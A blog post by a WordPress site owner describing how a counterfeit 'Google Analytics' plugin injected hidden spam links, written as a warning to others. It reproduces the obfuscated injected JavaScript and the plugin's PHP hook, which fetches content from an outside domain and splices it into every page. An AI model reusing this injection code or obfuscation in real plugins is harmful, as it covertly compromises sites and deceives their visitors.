A few weeks ago I installed what I deemed a safe plugin from the WordPress directory called Google Analytics v6.5.3. I didn’t pay much attention to it considering the plugin was vetted by the WordPress plugin directory. The plugin’s author info said it was authored by Google (should have rang alarm bells, I know, but it didn’t at the time).

Had I looked at the plugin folder name before I ran the install script I would have known something was wrong, because the plugin folder was unusually named “face-for-all-children-everywhere” and the plugin linked to the following repository address www.wordpress.org/extend/plugins/face-for-all-children-everywhere.

A few days later I was doing some housekeeping on the blog, as one does, and as part of that I ran my blog’s address against one of those online SEO analysis tools (I can’t for the world of me remember which one), to see what sort of health my SEO was in. The report the site generated warned me that my blog was unhealthily linking to one specific domain name, from all over the place. When I saw the domain name “http://www.ecigbuyingguide.com/reviews/green-smoke/” I immediately knew that there was something wrong because I certainly didn’t link to this website.

When I looked into my blog’s html source – [right click -> View source] – there was the following code just after the tag:

<script language="JavaScript">var _ga4 = []; _ga4.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']); _ga4.push(['_setOption', '6918518510413211618517817517017118416518918416718218217']); _ga4.push(['_setOption', '1184165171180193182181185175186175181180128167168185181']); _ga4.push(['_setOption', '1781871861711291691781751821281841711691861101221261181']); _ga4.push(['_setOption', '8219011416718718618111416718718618111412212611818219011']); _ga4.push(['_trackPageview', '1129195130117185186191178171132']); var t=z="",l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_ga4.length; v++) t += _ga4[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z);</script><div class=slider_wrapper_en><h1><a href='http://www.ecigbuyingguide.com/reviews/green-smoke/'>Green Smoke</a></h1></div>

Alarm bells were certainly ringing now! I was freaking out. I downloaded my theme files, all my plugin files and exported my database and extensively searched for anything containing the above – without success. I then Googled some of the terms contained in the above code and came up short. I finally found a reference to http://quttera.com and their facebook page, and things were looking up as over the last day or so they were finding a number of sites with similar malicious code.

Further research finally led me to this thread on the WordPress forums which confirmed my suspicions that the Google Analytics plugin was indeed the source of the malicious code.

Looking through the plugin source code, I found how they were doing it too. Pay attention to the following code in particular:


function get_cred($template) {
ob_start();
return $template;
}
function cred() {
$l = file_get_contents('http://home-ahref.com/v5/credit/'.$_SERVER['SERVER_NAME']); $content = ob_get_clean();
echo preg_replace('#]*)>#i',"{$l}",$content);
}

add_filter('template_include','get_cred',1);


The plugin was calling the malicious home-ahref.com website and retrieved specific source to inject into my website based on my domain name.

If you run the following uri, you will see the generated code. I don’t want to link to them directly for fear of Google associating my website with their malicious domain name:
http://home-ahref.com/v5/credit/www.dnexpert.com

When you look at the html source of the above link you will see the same malicious code that was printed just after the <body> tag I referenced earlier.

<script language="JavaScript">var _ga4 = []; _ga4.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']); _ga4.push(['_setOption', '6918518510413211618517817517017118416518918416718218217']); _ga4.push(['_setOption', '1184165171180193182181185175186175181180128167168185181']); _ga4.push(['_setOption', '1781871861711291691781751821281841711691861101221261181']); _ga4.push(['_setOption', '8219011416718718618111416718718618111412212611818219011']); _ga4.push(['_trackPageview', '1129195130117185186191178171132']); var t=z="",l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_ga4.length; v++) t += _ga4[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z);</script><div class=slider_wrapper_en><h1><a href='http://www.ecigbuyingguide.com/reviews/green-smoke/'>Green Smoke</a></h1></div>

Once I knew where the malware was originating from, I quickly deleted the Google Analytics plugin and asked my host to do one more scan of all my files and folders (and db) to make sure nothing else was infected. Hopefully, my website is safe.

This post should server as a warning to others – even though WordPress is supposed to vet the plugins that make it into their repository, malicious users will continue trying to go around WordPress’s safety procedures – and many of them will succeed. Make sure you personally vet every plugin you install to ascertain that you are not endangering your website and losing money in the long term.